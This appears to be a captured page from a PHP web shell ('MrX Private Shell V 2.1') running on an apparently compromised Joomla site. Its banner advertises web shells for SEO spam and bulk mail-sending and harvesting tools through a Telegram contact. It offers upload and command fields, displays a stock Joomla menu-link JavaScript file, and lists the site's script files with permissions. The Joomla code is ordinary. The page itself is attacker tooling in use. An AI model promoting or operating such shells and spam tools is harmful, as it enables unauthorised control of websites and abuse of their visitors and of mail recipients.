__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/**
 * @copyright  (C) 2017 Open Source Matters, Inc. <https://www.joomla.org>
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */
((Joomla, document) => {

  /**
   * Javascript to insert the link
   * View element calls jSelectContact when a contact is clicked
   * jSelectContact creates the link tag, sends it to the editor,
   * and closes the select frame.
   */
  window.jSelectMenuItem = (id, title, uri, object, link, lang) => {
    let thislang = '';
    if (!Joomla.getOptions('xtd-menus')) {
      // Something went wrong!
      window.parent.Joomla.Modal.getCurrent().close();
      throw new Error('core.js was not properly initialised');
    }

    // eslint-disable-next-line prefer-destructuring
    const editor = Joomla.getOptions('xtd-menus').editor;
    if (lang !== '') {
      thislang = '&lang=';
    }
    const tag = `<a href="${uri + thislang + lang}">${title}</a>`;

    // Insert the link in the editor
    if (window.parent.Joomla.editors.instances[editor].getSelection()) {
      window.parent.Joomla.editors.instances[editor].replaceSelection(`<a href="${uri + thislang + lang}">${window.parent.Joomla.editors.instances[editor].getSelection()}</a>`);
    } else {
      window.parent.Joomla.editors.instances[editor].replaceSelection(tag);
    }

    // Close the modal
    if (window.parent.Joomla && window.parent.Joomla.Modal) {
      window.parent.Joomla.Modal.getCurrent().close();
    }
  };

  // Get the elements
  const elements = [].slice.call(document.querySelectorAll('.select-link'));
  elements.forEach(element => {
    // Listen for click event
    element.addEventListener('click', event => {
      event.preventDefault();
      const functionName = event.target.getAttribute('data-function');
      if (functionName === 'jSelectMenuItem') {
        // Used in xtd_contacts
        window[functionName](event.target.getAttribute('data-id'), event.target.getAttribute('data-title'), event.target.getAttribute('data-uri'), null, null, event.target.getAttribute('data-language'));
      } else {
        // Used in com_menus
        window.parent[functionName](event.target.getAttribute('data-id'), event.target.getAttribute('data-title'), null, null, event.target.getAttribute('data-uri'), event.target.getAttribute('data-language'), null);
      }

      // Close the modal
      if (window.parent.Joomla.Modal) {
        window.parent.Joomla.Modal.getCurrent().close();
      }
    });
  });
})(Joomla, document);

Filemanager

Name Type Size Permission Actions
admin-item-edit-es5.js File 4.45 KB 0664
admin-item-edit-es5.min.js File 2.78 KB 0664
admin-item-edit-es5.min.js.gz File 934 B 0664
admin-item-edit.js File 4.13 KB 0664
admin-item-edit.min.js File 2.71 KB 0664
admin-item-edit.min.js.gz File 928 B 0664
admin-item-edit_container-es5.js File 1.64 KB 0664
admin-item-edit_container-es5.min.js File 583 B 0664
admin-item-edit_container-es5.min.js.gz File 301 B 0664
admin-item-edit_container.js File 1.23 KB 0664
admin-item-edit_container.min.js File 464 B 0664
admin-item-edit_container.min.js.gz File 281 B 0664
admin-item-edit_modules-es5.js File 3.43 KB 0664
admin-item-edit_modules-es5.min.js File 1.98 KB 0664
admin-item-edit_modules-es5.min.js.gz File 674 B 0664
admin-item-edit_modules.js File 3.15 KB 0664
admin-item-edit_modules.min.js File 1.88 KB 0664
admin-item-edit_modules.min.js.gz File 659 B 0664
admin-item-modal-es5.js File 612 B 0664
admin-item-modal-es5.min.js File 305 B 0664
admin-item-modal-es5.min.js.gz File 217 B 0664
admin-item-modal.js File 530 B 0664
admin-item-modal.min.js File 267 B 0664
admin-item-modal.min.js.gz File 198 B 0664
admin-items-modal-es5.js File 2.63 KB 0664
admin-items-modal-es5.min.js File 1.3 KB 0664
admin-items-modal-es5.min.js.gz File 484 B 0664
admin-items-modal.js File 2.43 KB 0664
admin-items-modal.min.js File 1.25 KB 0664
admin-items-modal.min.js.gz File 468 B 0664
admin-menus-default-es5.js File 1.09 KB 0664
admin-menus-default-es5.min.js File 556 B 0664
admin-menus-default-es5.min.js.gz File 339 B 0664
admin-menus-default.js File 962 B 0664
admin-menus-default.min.js File 484 B 0664
admin-menus-default.min.js.gz File 316 B 0664
default-batch-body-es5.js File 788 B 0664
default-batch-body-es5.min.js File 268 B 0664
default-batch-body-es5.min.js.gz File 190 B 0664
default-batch-body.js File 689 B 0664
default-batch-body.min.js File 241 B 0664
default-batch-body.min.js.gz File 179 B 0664
Filemanager